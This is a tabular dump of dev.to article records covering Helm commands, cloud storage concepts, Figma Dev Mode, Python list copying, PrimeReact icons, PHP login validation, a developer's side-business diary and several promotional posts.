id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
1,917,709 | Comandos básicos do HELM | Listando o histório de deploys da release helm history {release} --namespace {namespace} ... | 0 | 2024-07-09T19:00:06 | https://dev.to/cnascimento/comandos-basicos-do-helm-2d36 | beginners, devops | Listando o histório de deploys da release
```
helm history {release} --namespace {namespace}
```
Executando o rollback
```
helm rollback {release} {revision} --namespace {namespace}
```
| cnascimento |
1,917,710 | hire skilled android app developers | Supercharge your business with Centric Tech's hire skilled android app developers expertise. Our... | 0 | 2024-07-09T19:02:08 | https://dev.to/john_michel_d7eb5159adf06/hire-skilled-android-app-developers-205a |
Supercharge your business with Centric Tech's[ hire skilled android app developers](https://centrictech.com/hire-android-app-developers/)
expertise. Our seasoned developers are ready to turn your groundbreaking ideas into reality. Elevate your brand with top-notch Android solutions tailored to meet your unique requirements. Whether you're launching a new app or enhancing an existing one, our experienced team ensures innovation and quality in every project. Harness the power of technology to stay ahead in the competitive landscape. Choose Centric Tech for unparalleled Android app development services and bring your business to new heights.
| john_michel_d7eb5159adf06 | |
1,917,711 | Understanding Storage Concepts in System Design | Understanding Storage Concepts in System Design In system design, storage concepts play a... | 0 | 2024-07-09T19:03:14 | https://dev.to/zeeshanali0704/understanding-storage-concepts-in-system-design-363i | javascript, systemdesign, systemdesignwithzeeshanali, learning | # Understanding Storage Concepts in System Design
In system design, storage concepts play a critical role in ensuring data reliability, accessibility, and scalability. From traditional disk-based systems to modern cloud storage solutions, understanding the fundamentals of storage architecture is crucial for designing efficient and resilient systems. This article delves into various storage concepts, including primary and secondary memory, RAID and volume configurations, and different types of storage options available in the cloud.
## Primary and Secondary Memory
### Primary Memory
Primary memory, also known as main memory, is the memory that the CPU directly accesses for executing instructions and processing data. It is volatile, meaning it loses its data when the system is turned off. Primary memory includes:
- **RAM (Random Access Memory):** Used for temporarily storing data that the CPU needs during operation. It is fast but volatile.
- **ROM (Read-Only Memory):** Non-volatile memory that retains its data even when the system is powered off. It is used to store firmware and system boot instructions.
### Secondary Memory
Secondary memory, also known as auxiliary storage, is non-volatile memory used for long-term data storage. It includes devices like hard drives, solid-state drives, and optical discs. Secondary memory retains data even when the system is powered off and is typically slower than primary memory but offers much larger storage capacity.
## RAID and Volume
### RAID and Volume
### RAID
RAID (Redundant Array of Independent Disks) is a storage technology that combines multiple physical disk drives into a single logical unit to improve data reliability, availability, and performance. The concept of RAID involves using multiple disks to either increase performance through parallelism, provide redundancy to protect against data loss, or both. Different RAID levels offer various configurations for data redundancy, striping, and parity:
- **RAID 0:** This level involves striping data across multiple disks without redundancy. This means that data is split into blocks and each block is written to a different disk. RAID 0 offers increased performance because multiple disks can be read or written to simultaneously. However, it does not provide fault tolerance; if one disk fails, all data is lost.
- **RAID 1:** Also known as mirroring, RAID 1 duplicates the same data on two or more disks. This provides high data redundancy because each disk is a complete copy of the other. If one disk fails, the data is still available on the other disk(s). However, the storage capacity is effectively halved because each piece of data is stored twice.
- **RAID 5:** This level uses striping with distributed parity. Data and parity (error-checking information) are striped across three or more disks. The parity information allows the array to reconstruct data if one disk fails. RAID 5 offers a good balance of performance, storage efficiency, and fault tolerance.
- **RAID 6:** Similar to RAID 5, but with double distributed parity. This means that parity information is written to two disks, allowing the array to withstand the failure of up to two disks without data loss. RAID 6 provides increased fault tolerance at the cost of additional storage overhead for the extra parity information.
- **RAID 10 (RAID 1+0):** This level combines the features of RAID 1 and RAID 0 by mirroring data and then striping it across multiple disks. This offers both high performance and redundancy. RAID 10 requires at least four disks and provides fault tolerance by mirroring, while also improving performance through striping.
### Volume
A volume is a logical storage unit that can span one or more physical disks or RAID arrays. Volumes are created and managed by the operating system or storage management software and provide a way to organize data into manageable units. They serve several key purposes:
- **Data Organization:** Volumes allow data to be organized into logical units, making it easier to manage, back up, and recover data.
- **File System Storage:** Volumes provide a logical space where file systems can be implemented. This includes directories, files, and metadata necessary for data storage and retrieval.
- **RAID Implementation:** Volumes can be configured with different RAID levels to meet specific requirements for performance, redundancy, and capacity. By using RAID, volumes can offer improved data reliability and performance.
Volumes can span single or multiple physical disks, and their size and configuration can be adjusted according to the needs of the system. This flexibility allows for efficient utilization of storage resources and can provide enhanced performance and fault tolerance based on the chosen RAID configuration.
## Storage Options in the Cloud
### Object Storage
Object storage is a storage architecture designed to handle large amounts of unstructured data with high durability, vast scalability, and cost-effectiveness. Unlike traditional file systems that use a hierarchical directory structure, object storage stores data as discrete units called "objects" in a flat structure. This makes object storage particularly suitable for purposes such as archival, backup, and managing massive data sets.
### Key Features of Object Storage
1. **Data as Objects**: In object storage, each piece of data is stored as an object. An object includes the data itself, metadata (information about the data), and a unique identifier. This identifier is used to locate the object in the storage system.
2. **Flat Structure**: Object storage does not use a hierarchical directory structure. Instead, all objects are stored in a flat namespace. This means that there are no nested folders, and each object is accessed directly via its unique identifier.
3. **High Durability**: Object storage systems are designed to be highly durable. Data is typically replicated across multiple servers or data centers to ensure that it is not lost due to hardware failures. This replication also aids in data recovery and availability.
4. **Scalability**: Object storage can easily scale to store vast amounts of data. As more storage capacity is needed, additional storage nodes can be added without significant reconfiguration or performance degradation.
5. **Cost-Effectiveness**: Object storage is often more cost-effective compared to other storage types, especially for storing large volumes of data over long periods. The architecture and design allow for cheaper storage solutions while maintaining durability and availability.
6. **RESTful API Access**: Data in object storage is accessed via a RESTful API, which makes it suitable for integration with various web-based applications and services. This API-driven access is different from the traditional block or file storage methods.
7. **Performance**: While object storage excels in durability and scalability, it is relatively slower compared to block or file storage. This is because it is optimized for high-throughput and large-scale data management rather than low-latency operations.
### Examples of Object Storage Services
- **AWS S3 (Amazon Simple Storage Service)**
- **Google Cloud Storage**
- **Azure Blob Storage**.
### Use Cases for Object Storage
- **Archival Storage**: Object storage is ideal for long-term data retention and archival purposes. Its high durability ensures that data remains intact over extended periods.
- **Backup**: Due to its cost-effectiveness and scalability, object storage is commonly used for storing backup data. It can handle large volumes of data and provide reliable storage for recovery purposes.
- **Content Distribution**: Object storage can store and deliver static content such as images, videos, and documents. The flat structure and RESTful API access make it suitable for serving content to web applications and users.
- **Data Lakes**: Organizations use object storage to build data lakes, where vast amounts of unstructured data from various sources are stored for analytics and processing.
### File Storage:
## File Storage
File storage builds on block storage by providing a higher-level abstraction for managing files and directories. It organizes data into a hierarchical structure of files and folders, making it easy for users and applications to store, retrieve, and manage data in a familiar way. File storage is commonly used for general-purpose storage solutions and is accessible by multiple servers using file-level network protocols such as SMB/CIFS (Server Message Block/Common Internet File System) and NFS (Network File System).
### Key Features of File Storage
1. **Hierarchical Directory Structure**: File storage uses a tree-like structure to organize data into files and directories. This structure is intuitive and easy to navigate, allowing users to create, delete, move, and manage files and directories.
2. **File-Level Access**: File storage provides access to data at the file level, meaning that operations are performed on whole files rather than on individual blocks or objects. This makes it suitable for applications that require granular access to data.
3. **Network Accessibility**: File storage can be accessed by multiple servers over a network using standard file-sharing protocols. SMB/CIFS and NFS are commonly used protocols that enable file sharing and collaborative access to data across different systems and platforms.
4. **Compatibility**: File storage systems are compatible with various operating systems and applications, making them versatile and widely adopted. They support a range of file formats and data types, from text documents and images to videos and log files.
5. **Data Management**: File storage systems offer built-in mechanisms for data management, including file permissions, quotas, and snapshots. These features help in managing access control, limiting storage usage, and creating point-in-time copies of data for backup and recovery.
### Examples of File Storage Systems
- **Local File Systems**: These are file systems that operate on a single machine. Examples include:
- **ext4**: A widely used file system in Linux.
- **NTFS (New Technology File System)**: The default file system for Windows operating systems.
- **Distributed File Systems**: These file systems spread data across multiple machines to provide high availability, scalability, and redundancy. Examples include:
- **NFS (Network File System)**: A distributed file system protocol allowing access to files over a network.
- **HDFS (Hadoop Distributed File System)**: A file system designed for storing large data sets across multiple machines in a Hadoop cluster.
- **Cloud Storage Services**: These services provide file storage capabilities in the cloud, offering scalability, durability, and accessibility from anywhere. Examples include:
- **Amazon S3 (Simple Storage Service)**
- **Google Cloud Storage**
### Advantages of File Storage Systems
1. **Simplicity**: File storage systems are easy to use and understand. The hierarchical directory structure is intuitive, making it straightforward for users to manage their data. This simplicity makes file storage suitable for small to medium-sized datasets and general-purpose storage needs.
2. **Flexibility**: File storage can handle a wide variety of data types and formats, including unstructured and semi-structured data such as documents, images, videos, and logs. This versatility makes it a good choice for many different applications and use cases.
3. **Cost-Effective**: File storage systems are often less expensive than more complex storage solutions like databases. They provide a cost-effective option for large-scale storage needs, especially when data doesn't require the advanced features of a database.
### Use Cases for File Storage
- **General Data Storage**: Storing everyday files such as documents, spreadsheets, and presentations.
- **Media Storage**: Managing large collections of images, videos, and audio files.
- **Log Storage**: Keeping application and system logs for monitoring and analysis.
- **Backup and Archiving**: Creating backups of important data and archiving old data for long-term retention.
- **Collaborative Work**: Enabling file sharing and collaboration among multiple users and systems in an organization.
## Block Storage
Block storage refers to a type of data storage commonly used in enterprise environments. It involves using storage devices like hard disk drives (HDDs) and solid-state drives (SSDs) to store data in raw blocks. These blocks of data are presented to the server as a volume, providing a flexible and versatile form of storage. Here, the server is responsible for formatting these raw blocks to use as a file system or for handing control of the blocks to an application directly.
**Key Features of Block Storage**
** Raw Data Blocks**: Block storage divides data into fixed-sized chunks called blocks. Each block has its own address but does not contain any metadata about the file it is part of, which is managed at the server level.
** Volume Presentation**: The blocks are presented to the server as a volume. A volume is a storage device that the server can format and use like a traditional hard drive. This volume can be partitioned, formatted with a file system, and mounted by the operating system.
**Versatility**: Block storage can be used for a variety of purposes:
File Systems: Servers can format the blocks and use them as file systems to store files and directories.
Applications: Some applications, like databases or virtual machine engines, manage these blocks directly to maximize performance.
**Performance Optimization**: By directly managing the blocks, applications can optimize how data is read and written. This direct access can result in higher performance, making block storage suitable for high-performance applications such as transactional databases and virtual machines.
Block storage is not limited to physically attached devices. It can also be connected to a server over a high-speed network using industry-standard protocols like Fibre Channel (FC) and iSCSI. Network-attached block storage still presents raw blocks to the server, functioning in the same way as physically attached storage.
Regardless of whether block storage is network-attached or physically attached, it is fully owned by a single server and is not a shared resource. This exclusive ownership allows for high performance and efficient management by the server.
**Use Cases for Block Storage**
Block storage is widely used in various scenarios due to its high performance and versatility:
**Databases**: High-performance databases often use block storage to ensure fast read and write operations. The ability to directly manage blocks allows databases to optimize data access patterns.
**Virtual Machines:** Virtual machine environments benefit from block storage because it provides the necessary performance and flexibility. Each virtual machine can have its own block storage volume, isolating its storage from others.
** Enterprise Applications**: Many enterprise applications that require fast, reliable storage use block storage. This includes applications like email servers, transaction processing systems, and content management systems.
### Database Storage
Database storage systems store data in a structured format, organized in tables with rows and columns. They are used for storing structured data, such as customer information, transactions, and product catalogs. Common database storage systems include relational databases (e.g., MySQL, PostgreSQL), NoSQL databases (e.g., MongoDB, Cassandra), and NewSQL databases (e.g., CockroachDB, TiDB).
**Advantages of Database Storage Systems:**
- **Query capabilities:** Powerful querying capabilities for complex data retrieval and analysis.
- **Data integrity:** Ensures data integrity through features like transactions, ACID properties (Atomicity, Consistency, Isolation, Durability), and constraints.
- **Scalability:** Designed to scale horizontally and vertically, suitable for large datasets and high concurrency.
## FAQs
1. **What is the difference between file storage systems and database storage systems?**
- File storage systems store data in files in a hierarchical structure, suitable for unstructured or semi-structured data. Database storage systems store data in structured formats, organized in tables, suitable for structured data with powerful querying capabilities.
2. **When should I use a file storage system?**
- File storage systems are ideal for storing large files, such as images and videos, and for scenarios where multiple users or applications need to access the same files concurrently.
3. **When should I use a database storage system?**
- Database storage systems are suitable for storing structured data, such as customer information and transactions, and for scenarios requiring complex queries, data joins, and aggregations.
4. **What are the scalability challenges of file storage systems?**
- Scaling file storage systems can be challenging, especially when dealing with large datasets and high concurrency, as they are designed primarily for simplicity and flexibility rather than scalability.
5. **What are the cost considerations for file storage systems?**
- File storage systems are often less expensive than database storage systems, especially for large-scale storage needs. However, costs can vary based on the storage provider and the scale of the deployment.
Understanding these storage concepts and their applications is essential for designing robust and scalable systems that can handle varying data requirements efficiently.
More Details:
Get all articles related to system design
Hastag: SystemDesignWithZeeshanAli
[systemdesignwithzeeshanali](https://dev.to/t/systemdesignwithzeeshanali)
Git: https://github.com/ZeeshanAli-0704/SystemDesignWithZeeshanAli
| zeeshanali0704 |
1,917,712 | Master Figma Dev Mode | What is Figma Dev Mode? Figma Dev Mode is a powerful feature designed to bridge the gap... | 0 | 2024-07-09T19:17:59 | https://codeparrot.ai/blogs/figma-dev-mode | webdev, figma, frontend | ## What is Figma Dev Mode?
Figma Dev Mode is a powerful feature designed to bridge the gap between designers and developers, facilitating smoother collaboration and more efficient workflows. It provides developers with a detailed view of design files, including access to specs, assets, and code snippets, ensuring that design implementation is as accurate and seamless as possible.
## How to Use Figma Dev Mode
### Step-by-Step Guide with Examples and Screenshots
1. **Accessing Dev Mode**:
- Open your Figma project.
- Navigate to the top-right corner and click on the Dev Mode icon.
- Keyboard Shortcut: ⇧ + D

2. **Exploring the Interface**:
- The interface will display a split view: the design on one side and the code/asset details on the other.

- First, you will see the code section. It has CSS codes, and you can change the language if you are using iOS or Android. Also, you can see some Figma plugins if you have installed them.
- You can see the borders and padding in the sidebar.

- **Selection Colors** section shows all the colors used in the selected element or group of elements.

- The **Assets** section allows you to access all the visual assets associated with the selected design element. This includes icons, images, and other graphical elements.
- Developers can download these assets in various formats such as PNG, SVG, or PDF, ensuring they have the necessary files for implementation.

- The **Export** section provides options to export selected elements or entire frames. You can specify the file format, resolution, and other export settings.

3. **Collaboration Tools**:
- Use comments and annotations to communicate directly within the design file.
- Assign tasks and share feedback in real-time with your team.

## Figma Dev Mode Pricing
### Starter Team - Free
- **Cost:** Free
- **Best for:** Individuals or small teams just starting out with limited collaboration needs.
- **Features:** Basic Figma editor, 3 collaborative design files, unlimited personal drafts, basic file inspection.
### Professional Team - $15/full seat/month
- **Cost:** $15 per full seat/month (Save 20% when billed annually)
- **Best for:** Small to medium-sized teams needing more collaboration tools and advanced prototyping. **Free for students and educators.**
- **Features:** Unlimited Figma files, team libraries, advanced prototyping, view annotations, advanced inspection, VS Code extension, unlimited version history, shared and private projects.
### Organization - $45/full seat/month or $25/month for Dev Mode only (billed annually)
- **Cost:** $45 per full seat/month or $25/month for Dev Mode only (billed annually)
- **Best for:** Larger teams needing organization-wide design management and analytics.
- **Features:** Org-wide libraries, design system analytics, branching and merging, private plugins, centralized file management, unified admin and billing, single sign-on.
### Enterprise - $75/full seat/month or $35/month for Dev Mode only (billed annually)
- **Cost:** $75 per full seat/month or $35/month for Dev Mode only (billed annually)
- **Best for:** Enterprises requiring advanced security, customization, and administrative controls.
- **Features:** Advanced design system theming, sync variables to code via REST API, default libraries by workspace, set default code language, pin and auto-run plugins, dedicated workspaces, guest access controls, seat management via SCIM, idle session timeout, advanced link sharing controls.
## Benefits of Using Figma Dev Mode
1. **Improved Collaboration**:
- Figma Dev Mode enhances communication between designers and developers, reducing misunderstandings and errors in design implementation.
2. **Efficiency**:
- The feature streamlines the handoff process, saving time by providing developers with all the necessary design details in one place.
3. **Accuracy**:
- Developers get precise specifications and ready-to-use code snippets, ensuring that the final product matches the original design.
4. **Asset Management**:
- Easily download and manage design assets without the need for additional tools, keeping everything organized and accessible.
5. **Real-Time Updates**:
- As designs are updated, changes are reflected in real-time, ensuring that everyone is always working with the latest version.

By integrating Figma Dev Mode into your workflow, you can achieve a more cohesive and efficient design-to-development process, ultimately leading to better products and faster delivery times. | mvaja13 |
1,917,763 | Multiple ways to Clone or Copy a list in Python | Python provide multiple ways to achieve the desired result. For example, to copy a list to another... | 0 | 2024-07-09T19:41:53 | https://dev.to/pallavi_kumari_/multiple-ways-to-clone-or-copy-a-list-in-python-13c0 | python, beginners | Python provide multiple ways to achieve the desired result. For example, to copy a list to another list there are different methods:
- Through List slicing operation
**#Method 1**
lstcopy = lst[:]
print("Cloning By list slicing lst[:] ",lstcopy)
- Through copy() method
**#Method2**
lstcopy = lst.copy()
print("Cloning By list copying lst.copy() ",lstcopy)
- List Comprehension operation
**#Method3**
lstcopy = [i for i in lst]
print("Cloning By list Comprehension ",lstcopy)
- Through append() method
**#Method4**
lstcopy = []
for i in lst :
lstcopy.append(i)
print("Cloning By list append ",lstcopy)
Thanks,
I hope you learn something new from this article! Thanks for your support | pallavi_kumari_ |
1,917,713 | How To Add PrimeReact Icon In React App | Install PrimeReact and PrimeIcons: First, make sure you have primereact and primeicons installed in... | 0 | 2024-07-09T19:18:31 | https://dev.to/vishalbhuva666/how-to-add-primereact-icon-in-react-app-11ph | primereact, primereacticon, besticon, reacticon | Install PrimeReact and PrimeIcons:
First, make sure you have primereact and primeicons installed in your project.
If not, you can install them using npm or yarn:
**npm install primereact primeicons
yarn add primereact primeicons**
Import the CSS files: Import the necessary CSS files for PrimeReact and PrimeIcons in your index.js or App.js file.
**import 'primereact/resources/themes/saga-blue/theme.css';
import 'primereact/resources/primereact.min.css';
import 'primeicons/primeicons.css';**
| vishalbhuva666 |
1,917,759 | Juggling a Developer Job, Part-Time SaaS and Conference Speaking | Working on SaaS, conference speaking, and a developer job at the same time is challenging. This is how I juggle all of it. | 0 | 2024-07-09T19:22:00 | https://www.eddyvinck.com/blog/juggling-job-saas-and-conference-speaking/ | webdev, javascript, ai, react | ---
title: Juggling a Developer Job, Part-Time SaaS and Conference Speaking
published: true
description: Working on SaaS, conference speaking, and a developer job at the same time is challenging. This is how I juggle all of it.
tags: webdev, javascript, ai, react
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k63g4fds5mr9cr10qldh.jpg
# Use a ratio of 100:42 for best results.
published_at: 2024-07-09 19:22 +0000
canonical_url: https://www.eddyvinck.com/blog/juggling-job-saas-and-conference-speaking/
---
_This was originally posted on [my website's blog](https://www.eddyvinck.com/blog/juggling-job-saas-and-conference-speaking/)
Launching a side business is no small thing, especially when you're juggling a job and a personal life. I've recently started with this challenging journey with my blogging SaaS, Blog Recorder. It's been a couple of weeks since the launch, and I'm proud to say it's been quite successful for a small, part-time business.
## The early success
I've managed to secure six paying customers, with four opting for annual subscriptions and two on a monthly basis. This has brought me to a modest $75 in monthly recurring revenue, and I've attracted over 120 users in total. To me that is a huge win, and every new customer and piece of feedback is a cause for celebration.
## The grind of part-time entrepreneurship
I work 32 hours a week at my day job as a software developer, and I dedicate my other time to my business. That's nights, weekends, and a full dedicated day off. It's a grind, but it's really fulfilling. I'm also passionate about conference speaking, which I've been trying to maintain alongside my SaaS.
## Balancing work, speaking, and personal life
The balance is tough. Preparing for a conference talk while running a business and working part-time is taxing. I'm flying to Wisconsin for THAT Conference, an event I'm excited about, but it has required a lot of legwork to find a sponsor to help cover travel costs.
Thankfully, the conference organizers have been supportive, offering a good deal on my hotel stay. And surprisingly, I've also been given the opportunity to be on the list of sponsors for the conference, which includes a table to promote Blog Recorder. They really didn't need to do that, and I'm really thankful for this chance. It will be the first time I'm sponsoring an event and promoting something myself, so I'm curious how it will go.
## The reality of overcommitment
Despite the excitement, I've come to realize that I may have underestimated the amount of work I can handle over an extended period. From launching the product to learning how to handle international sales tax with my accountant has been a lot to manage. I'm learning that in the long term I need to cut back and focus on fewer tasks to maintain a sustainable pace if I keep doing this outside of my developer job.
## The importance of self-care
One crucial lesson I've learned is the importance of self-care. Ensuring I get a full eight hours of sleep and not slipping into hermit mode are top priorities. I'm no longer skipping the gym to get a few extra hours of work in, which is something I intentionally did to work on my launch.
Socializing is also key. I want to make sure I stay in contact with friends and family.
## Preparing for the conference
As for the conference, I am creating an outline for my talk, creating a demo application for a small product, and polishing my slides. I'm not too worried about giving the talk itself as I'm confident in my speaking abilities, but the preparation is key and is still a lot of work for the upcoming weeks.
## Intentionality and focus
In the end, it's about being intentional with my time and energy. Saying no to many good things to focus on the right things is hard but necessary. As a part-time entrepreneur, conference speaker, partner, and individual, focusing on what truly matters is the key to success and a long-term sustainable work-life balance.
In conclusion, managing part-time SaaS, conference speaking and a developer job is really challenging sometimes, but it is also something that makes me happy. It requires a good balance of work, passion projects, and personal life. With intentionality, focus, and taking care of yourself, it is definitely possible. But choosing these things means saying no to a lot of other things.
## And before you ask..
Yes, this post was created using [Blog Recorder](https://blogrecorder.com)! It can export to markdown, so crossposting to Dev.to is super easy! I'll be sharing my articles here more often 🥳 | eddyvinck |
1,917,760 | ** ¡Únete a Try Catch Factory y Descubre un Mundo de Beneficios Tecnológicos! **🌐 | ¡Hola Chiquis! 👋🏻 ¿Sabes qué es una fábrica de software o los beneficios que tiene para los... | 0 | 2024-07-09T19:29:49 | https://dev.to/orlidev/-unete-a-try-catch-factory-y-descubre-un-mundo-de-beneficios-tecnologicos--5bbd | productivity, webdev, microservices, beginners | ¡Hola Chiquis! 👋🏻 ¿Sabes qué es una fábrica de software o los beneficios que tiene para los desarrolladores o futuros clientes? Si tu respuesta es no, pues ¡no te preocupes!, vamos adentrarnos en el fascinante mundo de las fábricas de software, mientras nos preparamos con bombos y platillos para el gran lanzamiento de Try Catch Factory! 🧑🏻🏭 la comunidad que está revolucionando la forma de desarrollar software. ¡La espera está a punto de terminar y Try Catch Factory se complace en anunciar que su lanzamiento oficial está a la vuelta de la esquina!

Fábricas de Software 👩💻
Una fábrica de software implementa diversas estrategias para apoyar y potenciar a sus desarrolladores, con el objetivo de fomentar su crecimiento profesional, bienestar y satisfacción laboral, lo que a su vez se traduce en mejores resultados para la empresa. Entre sus acciones se encuentran:
- Capacitación y desarrollo profesional.
- Herramientas y recursos.
- Ambiente de trabajo positivo.
- Oportunidades de crecimiento.
Al implementar estas estrategias, las fábricas de software pueden crear un entorno de trabajo que atraiga y retenga a los mejores desarrolladores, lo que se traduce en una mayor productividad, innovación y éxito para la empresa y sus desarrolladores.

En Try Catch Factory, 🖱️ nos centramos en desarrollar productos y funciones de alta calidad, utilizando un código eficiente. Además, facilitar el desarrollo colaborativo basado en las necesidades y requisitos específicos de los clientes y usuarios. 😊
Innovación a Medida 💻
En Try Catch Factory, no creemos en soluciones genéricas. Nuestro equipo de desarrolladores expertos crea aplicaciones personalizadas que se ajustan como un guante a tus necesidades específicas. ¿Por qué conformarte con lo común cuando puedes tener algo diseñado especialmente para ti? 🤝
Asesoramiento Tecnológico de Alto Nivel ⚙️
¿Te sientes perdido en el mundo de la tecnología? No te preocupes. En Try Catch Factory, ofrecemos consultoría tecnológica de primera clase. Te ayudamos a optimizar tus procesos y a tomar decisiones informadas sobre las últimas tendencias y herramientas. ¡Nunca más te sentirás como un pez fuera del agua!
Soporte Continuo 🖥️
¿Qué pasa si algo sale mal? No te preocupes, estamos aquí para ti. Nuestro equipo de soporte garantiza que tus sistemas funcionen sin problemas. Si tienes una pregunta, un problema o simplemente necesitas un poco de ánimo, estamos a solo un mensaje de distancia. ¡No más llamadas al vacío!

Beneficios Exclusivos para Nuestros Clientes 🧑🏻💻
¿Quieres saber un secreto? Los clientes de Try Catch Factory obtienen acceso a beneficios exclusivos. Nos aseguramos de que formes parte de una comunidad especial. ¡No es solo un software, es una experiencia!✨
Velocidad, Eficiencia y Éxito 🚀
En Try Catch Factory, no solo creamos software, creamos oportunidades para el éxito. Tu proyecto será un paso adelante en la eficiencia y la efectividad. Así que, ¿qué esperas? Únete a Try Catch Factory y descubre un mundo de posibilidades tecnológicas. ¡Te prometemos que no te arrepentirás! 📈

¡Revoluciona tu negocio y alcanza el éxito con las soluciones de software Try Catch Factory! Diferénciate de la competencia con soluciones de software innovadoras y personalizadas.💯
🚀 ¿Te ha gustado? Comparte tu opinión.
Artículo completo, visita: https://lnkd.in/ewtCN2Mn
https://lnkd.in/eAjM_Smy 👩💻 https://lnkd.in/eKvu-BHe
https://dev.to/orlidev ¡No te lo pierdas!
Referencias:
Imágenes creadas con: Copilot (microsoft.com)
##PorUnMillonDeAmigos #LinkedIn #Hiring #DesarrolloDeSoftware #Programacion #Networking #Tecnologia #Empleo #TryCatchFactory

 | orlidev |
1,917,761 | Extraction of Form Validation Object and Authenticate Class | In our previous project, we learned how to login or logout a registered user. But today, we will... | 0 | 2024-07-09T19:33:02 | https://dev.to/ghulam_mujtaba_247/extraction-of-form-validation-object-and-authenticate-class-b8m | webdev, beginners, css | In our previous project, we learned how to login or logout a registered user. But today, we will learn how to extract a form validation object and about authenticate class extraction in the project.
## On VS Code Side
To start the project, we need to add a new directory named Http, then move the controllers into this new directory. Next, we need to add another new directory in Http named Forms and add a new file LoginForm in this directory. Then, we need to run the project, which will show an error because the controllers have been moved to a new directory and their routes need to be updated in `routes.php`.
```php
$router->get('/', 'index.php');
$router->get('/about', 'about.php');
$router->get('/contact', 'contact.php');
$router->get('/notes', 'notes/index.php')->only('auth');
$router->get('/note', 'notes/show.php');
$router->delete('/note', 'notes/destroy.php');
$router->get('/note/edit', 'notes/edit.php');
$router->patch('/note', 'notes/update.php');
$router->get('/notes/create', 'notes/create.php');
$router->post('/notes', 'notes/store.php');
$router->get('/register', 'registration/create.php')->only('guest');
$router->post('/register', 'registration/store.php')->only('guest');
$router->get('/login', 'session/create.php')->only('guest');
$router->post('/session', 'session/store.php')->only('guest');
$router->delete('/session', 'session/destroy.php')->only('auth');
```
## Extract Form Validation Object
To extract a form validation object, we need to go to session/store.php and cut the code that checks if the provided email and password are correct. We then need to move this code to the LoginForm.php file, which is located in the Http/Forms directory.
## LoginForm
The `LoginForm.php` file will contain data related to user login to validate forms and protected errors array that points to errors in project
```php
<? php
namespace Http\Forms;
use Core\Validator;
class LoginForm {
protected $errors = [];
public function validate($email, $password) {
if (!Validator::email($email)) {
$this->errors['email'] = 'Please provide a valid email address.';
}
if (!Validator::string($password)) {
$this->errors['password'] = 'Please provide a valid password.';
}
return empty($this->errors);
}
public function errors() {
return $this->errors;
}
public function error($field, $message) {
$this->errors[$field] = $message;
}
}
```
Now we can see that project is working well.
## Extract Authenticate Class
Next , to extract an authenticate class, we need to select all code segments that are used to authenticate the user, such as checking the user's email and password. We then need to add a new file `authenticator.php`, which will contain an authenticate class used for user authentication then login and logout functions were imported.
```php
<?ph
namespace Core;
class Authenticator {
public function attempt($email, $password) {
$user = App::resolve(Database::class)
->query('select * from users where email = :email', [ 'email' => $email ])
->find();
if ($user) {
if (password_verify($password, $user['password'])) {
$this->login([ 'email' => $email ]);
return true;
}
}
return false;
}
public function login($user) {
$_SESSION['user'] = [ 'email' => $user['email'] ];
session_regenerate_id(true);
}
public function logout() {
$_SESSION = [];
session_destroy();
$params = session_get_cookie_params();
setcookie('PHPSESSID', '', time() - 3600, $params['path'], $params['domain'], $params['secure'], $params['httponly']);
}
}
```
## Update session store file
Further moving , We need to go back to session/store.php and initialize the $form and in for the new user login. We then need to implement an if condition to check if the form is valid or not. If the form is not valid, we have to redirect the user to the desired path.
```php
<?php
use Core\Authenticator;
use Http\Forms\LoginForm;
$email = $_POST['email'];
$password = $_POST['password'];
$form = new LoginForm();
if ($form->validate($email, $password)) {
if ((new Authenticator)->attempt($email, $password)) {
redirect('/');
}
$form->error('email', 'No matching account found for that email address and password.');
}
return view('session/create.view.php', [ 'errors' => $form
```
By making these changes we can extract a authenticate class to change the look of our code means easy to understand and modify.
I hope that you have clearly understood it | ghulam_mujtaba_247 |
1,917,811 | dddffg | eettttttt | 0 | 2024-07-09T20:53:23 | https://dev.to/szizyava/dddffg-4jnl | eettttttt | szizyava | |
1,917,765 | Kirill Yurovskiy: Digital Strategies and E-commerce | In the present interconnected world, organizations of all sizes are tracking down uncommon chances to... | 0 | 2024-07-09T20:00:02 | https://dev.to/alexgrace012/kirill-yurovskiy-digital-strategies-and-e-commerce-1mbg | In the present interconnected world, organizations of all sizes are tracking down uncommon chances to grow their span across borders. The computerized insurgency has destroyed customary obstructions to sections, permitting organizations to take advantage of worldwide business sectors with no sweat. Be that as it may, progress in this new scene requires a modern comprehension of computerized systems and online business best practices. We should investigate how organizations can use these apparatuses to flourish in the worldwide commercial center.

**The Global E-commerce Boom**
The numbers don't lie: worldwide web-based business deals are projected to reach $6.3 trillion by 2024, as indicated by eMarketer. This touchy development is driven by expanding web entrance, the expansion of cell phones, and changing buyers' ways of behaving. For organizations, this addresses a once-in-a-lifetime chance to arrive at clients a long way past their nearby business sectors.
Be that as it may, entering the worldwide field isn't quite as straightforward as setting up a web-based store and staying optimistic. It requires a painstakingly created computerized technique that considers the one-of-a-kind difficulties and chances of working in different business sectors - says [Yurovskiy Kirill](https://fundly.com/kirill-yurovskiy-smart-expansion-into-new-markets).
## Building a Strong Digital Foundation
The foundation of any fruitful worldwide online business system is a vigorous computerized framework. This incorporates:
1. A responsive, versatile site: With portable businesses representing more than 70% of internet business deals in certain business sectors, having a webpage that performs impeccably on cell phones is non-debatable.
2. Various language choices: Offering your site in the neighborhood language of your objective business sectors can altogether help change rates. Instruments like WPML for WordPress or Weglot can improve the most common way of making a multilingual site.
3. Limited content: Past simple interpretation, your substance ought to be socially significant and reverberate with nearby crowds. This could include adjusting item depictions, and symbolism, and showcasing messages to suit neighborhood tastes and customs.
4. Secure installment entryways: Offering an assortment of installment choices that are well known in your objective business sectors is vital. This could incorporate neighborhood installment techniques like Alipay in China or SEPA in Europe, close by worldwide choices like PayPal and significant Mastercards.
5. Vigorous planned operations and satisfaction abilities: Collaborating with neighborhood or territorial satisfaction places can assist with diminishing delivery times and expenses, further developing consumer loyalty.
## Leveraging Data for Market Insights
In the advanced age, information is the best. Fruitful worldwide organizations utilize progressed examination to acquire profound bits of knowledge into their objective business sectors. This incorporates:
- Market size and development potential
- Customer conduct and inclinations
- Serious scene
- Administrative climate
Instruments like Google Examination, SEMrush, and nearby statistical surveying reports can give significant information to illuminate your procedure. The key is to utilize this information to settle on informed conclusions about item contributions, estimating methodologies, and showcasing approaches.
